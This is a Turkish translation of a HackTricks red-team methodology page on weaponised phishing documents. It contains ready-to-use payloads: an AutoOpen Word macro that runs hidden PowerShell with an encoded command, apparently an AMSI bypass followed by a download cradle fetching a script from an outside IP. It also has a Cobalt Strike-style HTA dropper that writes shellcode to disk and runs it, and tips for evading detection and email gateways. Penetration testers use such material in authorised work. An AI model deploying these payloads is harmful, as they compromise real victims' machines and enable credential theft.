hacktricks/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md

Phishing Dosyaları ve Belgeleri

AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

• Bir cybersecurity şirketinde çalışıyor musunuz? Şirketinizi HackTricks'te reklamını görmek ister misiniz? veya PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek ister misiniz? ABONELİK PLANLARINI kontrol edin!
• The PEASS Ailesi'ni, özel NFT'lerimiz koleksiyonumuzu keşfedin
• Resmi PEASS & HackTricks ürünlerini edinin
• 💬 Discord grubuna veya telegram grubuna katılın veya Twitter'da takip edin 🐦@carlospolopm.
• Hacking hilelerinizi hacktricks repo ve hacktricks-cloud repo'ya PR göndererek paylaşın.

Ofis Belgeleri

Microsoft Word, bir dosyayı açmadan önce dosya veri doğrulaması yapar. Veri doğrulaması, OfficeOpenXML standardına karşı veri yapısı tanımlama şeklinde gerçekleştirilir. Veri yapısı tanımlama sırasında herhangi bir hata oluşursa, analiz edilen dosya açılmaz.

Genellikle makrolar içeren Word dosyaları .docm uzantısını kullanır. Ancak, dosya uzantısını değiştirerek dosyanın adını değiştirmek ve hala makro yürütme yeteneklerini korumak mümkündür.
Örneğin, RTF dosyası, tasarım gereği makroları desteklemez, ancak RTF olarak adlandırılan bir DOCM dosyası Microsoft Word tarafından işlenecek ve makro yürütme yeteneklerine sahip olacaktır.
Aynı iç yapı ve mekanizmalar, Microsoft Office Suite'in diğer yazılımlarında da geçerlidir (Excel, PowerPoint vb.).

Aşağıdaki komutu kullanarak, bazı Office programları tarafından yürütülecek uzantıları kontrol edebilirsiniz:

assoc | findstr /i "word excel powerp"

DOCX dosyaları, makrolar içeren uzaktan bir şablona (Dosya - Seçenekler - Eklentiler - Yönet: Şablonlar - Git) referans vererek makroları "çalıştırabilir".

Harici Resim Yükleme

Git: Ekle --> Hızlı Parçalar --> Alan
Kategoriler: Bağlantılar ve Referanslar, Alan Adları: includePicture ve Dosya Adı veya URL: http://<ip>/herhangi_birşey

Makrolar Arka Kapı

Belgeden keyfi kod çalıştırmak için makroları kullanmak mümkündür.

Otomatik Yükleme Fonksiyonları

Ne kadar yaygın olurlarsa, AV tarafından tespit edilme olasılıkları o kadar yüksek olur.

• AutoOpen()
• Document_Open()

Makro Kodu Örnekleri

Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub

Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub

Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1

Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

Meta verileri manuel olarak kaldırma

Dosya > Bilgi > Belgeyi İncele > Belgeyi İncele yolunu izleyin, bu Belge Denetleyicisini açacaktır. İncele'ye tıklayın ve ardından Belge Özellikleri ve Kişisel Bilgiler yanındaki Tümünü Kaldır'a tıklayın.

Doc Uzantısı

Tamamlandığında, Farklı Kaydet açılır menüsünden .docx formatını Word 97-2003 .doc olarak değiştirin.
Bunu yapmanızın nedeni, makroları .docx içine kaydedememeniz ve makro destekli .docm uzantısının bir stigmaya sahip olmasıdır (örneğin, küçük resim simgesinde büyük bir ! işareti bulunur ve bazı web/e-posta geçitleri bunları tamamen engeller). Bu nedenle, bu eski .doc uzantısı en iyi uzlaşmadır.

Zararlı Makro Oluşturucuları

• MacOS
• macphish
• Mythic Macro Generator

HTA Dosyaları

Bir HTA, HTML ve VBScript ve JScript gibi betik dillerini birleştiren bir Windows programıdır. Kullanıcı arayüzünü oluşturur ve bir tarayıcının güvenlik modelinin kısıtlamaları olmadan "tamamen güvenilir" bir uygulama olarak çalışır.

Bir HTA, genellikle Internet Explorer ile birlikte kurulan mshta.exe kullanılarak çalıştırılır, bu nedenle mshta IE'ye bağımlıdır. Bu nedenle, IE kaldırıldıysa, HTA'lar çalıştırılamaz.

<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>

<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

NTLM Kimlik Doğrulamasını Zorlama

NTLM kimlik doğrulamasını "uzaktan" zorlamak için birkaç yol vardır, örneğin, kullanıcıya erişeceği e-postalara veya HTML'e görünmez resimler ekleyebilirsiniz (hatta HTTP MitM ile?). Veya kurbanı, yalnızca klasörü açmak için bir kimlik doğrulaması tetikleyecek dosyaların adresini gönderebilirsiniz.

Bu fikirleri ve daha fazlasını aşağıdaki sayfalarda kontrol edin:

{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}

{% content-ref url="../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md" %} places-to-steal-ntlm-creds.md {% endcontent-ref %}

NTLM Aktarımı

Unutmayın, sadece hash'i veya kimlik doğrulamasını çalmakla kalmaz, aynı zamanda NTLM aktarım saldırıları da gerçekleştirebilirsiniz:

• NTLM Aktarım Saldırıları
• AD CS ESC8 (Sertifikalara NTLM aktarımı)

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahramana kadar AWS hackleme öğrenin!

• Bir cybersecurity şirketinde mi çalışıyorsunuz? Şirketinizi HackTricks'te reklamını görmek ister misiniz? veya PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek ister misiniz? ABONELİK PLANLARINI kontrol edin!
• The PEASS Family koleksiyonumuzdaki özel NFT'leri keşfedin
• Resmi PEASS & HackTricks ürünlerini alın
• 💬 Discord grubuna veya telegram grubuna katılın veya Twitter'da beni takip edin 🐦@carlospolopm.
• Hacking hilelerinizi hacktricks repo ve hacktricks-cloud repo'ya PR göndererek paylaşın.